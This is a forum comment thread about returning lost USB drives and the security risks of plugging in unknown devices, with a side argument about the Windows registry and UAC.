Hm. Honestly, it had never occurred to me to do this, but that's a good idea. Back in the day of floppies, I'd regularly put contact info on the label in case I lost it, but I never really translated it to USB sticks. I'm more prone to breaking them than losing them, so maybe it doesn't matter anyway, but it's still a good suggestion.

Re:USB keyboard. Your computer DOES run the comman

[houghi]

Perhaps the computer is intend not to have a keyboard and now you put one in, no warning! There is a reason for the 'Press F1' warning in your bios.
So if you go the warning way, you should do it any time you plug it and unplug it AND block the PC until some action has been taken or until it is restored in the old state, e.g. removed the device,
That would mean if you plug in a new keyboard, IT needs to come and enter their password or give the users the authority to do so themselves.

The majority of companies have all USB ports active, so there is that as well.

Re:USB keyboard. Your computer DOES run the comman

[flyingfsck]

On BSD at least, you can lock the install to a specific USB keyboard ID, so then it won't accept a random HID.

Re:People are stupid [Not]

[JustAnotherOldGuy]

I meant in this context or case. I thought that was obvious, or are you just joking around?

Sometimes even I can't tell. ;)

Re:Wrong problem

[Karmashock]

As to good luck determining whatever in advance...It would be very easy to have a few ways it could work by default and then it could just cycle through them until it worked. At which point... no cycling required because it would only need to go through that process on initial load or possibly shortly after if there were a problem. What is more, records of which method works for which program could be automatically uploaded and queried by new installs of the same program on different machines.

I mean come on... at least give the idea a fair chance before coming up with any old bullshit to shit on it. Its not reasonable to think heavily about one thing to justify the status quo and then shit all over some new idea because every detail of it hasn't be carefully specified to include lines like "and I won't put screen doors on this submarine"...

Please assume I'm not stupid. I'm not. It is a waste of our mutual time explore assumptions of my argument if you assume I am stupid. It leaves you making arguments that I'm going to knock down and me tediously going through things I don't believe and pointing it out to you.

Save us both that time and just assume i'm not stupid.

As to a centralized repository, its an inferior method when you add up all the pros and cons. I don't question that there are some pros. They're just not that great. I and obtain most of the point of a centralized system by simply having the decentralized system be organized.

As to hardware needing to talk to hardware... we're are talking about settings and not memory variables. Regardless, if Driver X wants to query a setting in Driver Y... it can do that by querying the location of that driver's setting file, which will be stored centrally, and then it can navigate to that directory and examine the setting there.

Beyond that, there are operating systems that work exactly as I describe in so far as drivers. And they work just fine. So it clearly is functional.

As to my luck controlling something that is amalgamating lots of files into a central interface that makes the whole thing seem transparently like the old registry hive system even though it is actually distributed files.

I don't need luck... that's fucking easy.

As to nuanced versus crude back up systems. The systems are exceptionally crude by default these days and you know it. People ghost their drives in these situations in large part because the registry is such a clusterfuck of unmanageable bullshit.

Re:USB keyboard. Your computer DOES run the comman

[phantomfive]

Oh, that's a good solution.

USBGuard

[flyingfsck]

Those who use a real computer, can run USBGuard: https://dkopecek.github.io/usb...

It provides a very simple way to control the devices that are allowed to hook to your machine via a kernel security feature that has been there for many a year: https://www.kernel.org/doc/Doc...

Re:USB keyboard. Your computer DOES run the comman

[Rakarra]

How many have seen this error on boot over the years.

keyboard not detected - press F1 to continue.

It makes sense to me. Keyboard not detected.. plug in keyboard.. press F1 to keep booting.

sacrificial Mac

[skinfaxi]

I keep an old laptop for this kind of thing. It doesn't have any useful data on it or a live network connection and it won't run Windows malware, so it's pretty low risk. My users know to bring drives they find to me, not plug them into their own hardware. I have not found any hostile programs but have made a couple people happy by returning their lost drives.

Re:Wrong problem

[david_thornley]

I usually don't praise Vista, but it gave things a push in the right direction. It wasn't real friendly to software that demanded admin rights, and while computer users were complaining about UAC software vendors were rewriting their stuff to run on more limited accounts. For many people it was a real pain, but it was a necessary part of going from the old Win 3.1/95 idea that this is a one-person computer and that person can do anything to the more modern idea of limited privileges.

Re:Computers and infection from malicious USB Driv

[david_thornley]

Because Microsoft at least used to act as if it were alone in the world, much like IBM before it. Back in the mid-70s, if you saw a reference to "computers" or "mainframes" you'd think about an IBM mainframe.

Re:People are stupid [Not]

[WorBlux]

Yes but Vulkans are very logical and program all non-systems code in Haskell or Ada so the don't have bugs. In real life, the barrier between code and data is not well maintained, meaning specially crafted files can launch from exploits in thumb-nailing or preview programs.

And a really nasty USB device might emulate a keyboard and monitor, use the keyboard to set up a second monitor, and run exploits just as well as if the hacker had access to the unlocked workstation.

Re:Wrong problem

[Karmashock]

I'll grant that it was good in that it "aspired" to change the permission paradigm. However, it didn't actually restrict programs from breaching those permissions if they were coded to be aggressive about it. And very importantly, the implementation was so hamfisted that users largely disabled it because it wasn't functional or was annoying.

Again, I grant that the aspiration was laudable. But that's about it.

Re:Wrong problem

[Karmashock]

As to elegance, the inelegant proposal refers to backward compatibility. Emulations are never elegant. So you can either get behind an emulation, accept the status quo, or lose backward compatibility.

Choose. Ultimately the status quo is not sustainable indefinitely and so emulation or losing compatibility is all that is left.

That is the choice. Losing capability and thus functionality is of course easier and more "elegant"... it is also less useful and renders the entire operating system less viable.

As to worrying about whether you think I'm stupid, it isn't your 'feelings' that bother me but rather that you waste my time by making obtuse objections that you seem to think should be responded to with tediously detailed replies that cover any possible fuck up you can think of...

I don't need to do that because I'm not autistic.

As to drivers querying each other's settings... zero sum game... existing system already has them doing that. You're just doing it within the registry hive which from the perspective of the drivers should be an arbitrary distinction. They know how to find the entry in the hive because they are given instructions on when to look for it and how to find it. That is all. That instruction updated to reflect the when and the how will be included in the OS and so from the perspective of the drivers it should be similar enough that your objection is irrelevant.

As to the entries being hard to amalgamate... you confuse scale with difficulty. It is not hard to move sand from one place to another with a spoon. It just takes awhile. These operating systems are coded by thousands of people over many years and the code from successive generations of the OS are reused by versions going forward. So yes... it would be a pain in the ass to implement such a program because there are a lot of entries. But the actual coding would be very simple. I can think of a few ways to simplify it radically. Its not complex so much as an ungodly huge number of settings. But they're mostly so obnoxious because they're all stored in one place. Break it down and the settings become much much much easier to manage.

As to people doing things this way because it is the easiest way to do it... yes... and it is the easist way to do it because if something gets fucked in the registry it isn't practical to fix it. Where as if the settings were segmented down to individual drivers etc that would be much more viable. And thus a more surgical response would be possible.

But you're right... if things stay as they are... then the crude response will remain the default... which was my argument... so you agree with me.

Re:People are stupid [Not]

[Coren22]

It should be interesting what more can be done on the new USB-C connections that have USB and Thunderbolt, as they will have access to the PCI-e bus directly.

Re:The chance of getting juicy selfies are a lot h

[Coren22]

When in college, I found someone's flash drive. It had been run over by a vehicle, so I got the email address from a resume and emailed them the field with a note about the hardware being destroyed. Never much thought much about it, but this was 15+ years ago.

Re:The chance of getting juicy selfies are a lot h

[Coren22]

Is that true on a college campus though where people use the USB sticks for all their files?

Maybe Re:Software

[davidwr]

If the USB port chipset is smart enough, it may communicate with the plugged-in devices in ways that are harmful - such as exploiting a bug in the USB chipset's firmware - before the non-firmware software can act on it.

This is where a "USB condom" comes in - while it is a single point of failure (its software can be buggy) it is a single, small thing that can be designed and built with security in mind from the get-go.

Re:Maybe Re:Software

[dbIII]

If the USB port chipset is smart enough

It isn't very "smart" at all, which made it cheap, which is why we are using USB and not firewire.
Consider how even USB storage consumes a lot of CPU cycles to deal with.

Re:USB keyboard. Your computer DOES run the comman

[toddestan]

This message predated USB for quite a while, and the old PS/2 ports are not hot pluggable. So it used to be see message... plug in keyboard... push reset* button.

*Remember those?

Re:People are stupid [Not]

[toddestan]

Firewire is (was?) similar since it had DMA access, so in theory a malicious firewire device could completely own the host if it was plugged in. Though in firewire's case, I never saw anything do that besides a few proofs of concept.

It's an age old story...

[iq145]

This kind of thing has been going on for a long long time... it's called sex.

Re:The chance of getting juicy selfies are a lot h

[thegarbz]

Is that true on a college campus though where people use the USB sticks for all their files?

Yes, yes it is. But even if you ignore stats themselves, ask yourself how do juicy selfies end up on a USB stick:

Step 1: Take selfie with mobile phone.
Step 2a: Share selfie with friend. No USB stick required, in fact stupid amounts of effort involved.
Step 2b: Copy selfie to computer. No USB stick required.

Step 1b: Take selfie with camera. Wait what? Who has cameras these days? When has a juicy selfie ever been a high quality 20mpxl photo?

It just doesn't make sense that people would put juicy selfies on a USB stick these days and half the problem with being on campus is Universities not providing easy means of remote access and ability to easily print. UQ actually went through a little bit of a change a few years ago. With the introduction of Google Docs, the removal of the stupid arbitrary 100MB / month data cap on university accounts, and the ability to connect and print via wifi, USB sticks almost went away completely.

At least they went away to the point where the service centre no longer has a lost and found for USB sticks. Sidenote: This was a great source of free USB sticks while I was at uni. Go to the lost and found and say you lost your USB stick and the guy at the counter asks what does it look like and if you said something like the red one with Verbatim written on it, or the Sandisk one, or a yellow one with a company logo on it, you get a free USB stick (no selfies though).

Re:The chance of getting juicy selfies are a lot h

[thewolfkin]

I get annoyed when people don't put a readme.txt in the root.

Hm. Honestly, it had never occurred to me to do this, but that's a good idea. Back in the day of floppies, I'd regularly put contact info on the label in case I lost it, but I never really translated it to USB sticks. I'm more prone to breaking them than losing them, so maybe it doesn't matter anyway, but it's still a good suggestion.

Considering how much work I'm willing to put into getting someone their USB drive back anything I can do to make it better for someone else.

My flash drives are always Portable Apps installations so it's:

• - Documents
• - Applications
• - Start.exe
• - READMEIFFOUND.TXT